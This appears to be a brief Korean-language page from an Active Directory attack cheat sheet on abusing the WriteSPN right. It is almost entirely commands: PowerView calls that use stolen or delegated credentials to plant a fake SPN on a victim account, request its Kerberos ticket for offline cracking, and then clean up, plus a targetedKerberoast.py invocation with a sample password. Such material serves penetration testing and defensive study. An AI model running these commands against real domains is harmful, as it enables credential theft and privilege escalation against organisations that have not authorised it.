WriteSPN
# 권한이 있는 사용자 개체 정보 변수화
$SecPassword = ConvertTo-SecureString <PASS> -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(contoso.com/user-A, $SecPassword)
# 도메인 객체 정보 저장
Set-DomainObject -Credential $Cred -Identity user-B -SET @{serviceprincipalname='nonexistent/HTTP'}
# SPN 등록
Get-DomainSPNTicket -Credential $Cred user-B | fl
# 공격 후 SPN 정리
Set-DomainObject -Credential $Cred -Identity user-B -Clear <SPN>python3 targetedKerberoast.py -v -d contoso.com -u user-A -p 'Password123!' --request-user user-B --only-abuseReferences
Last updated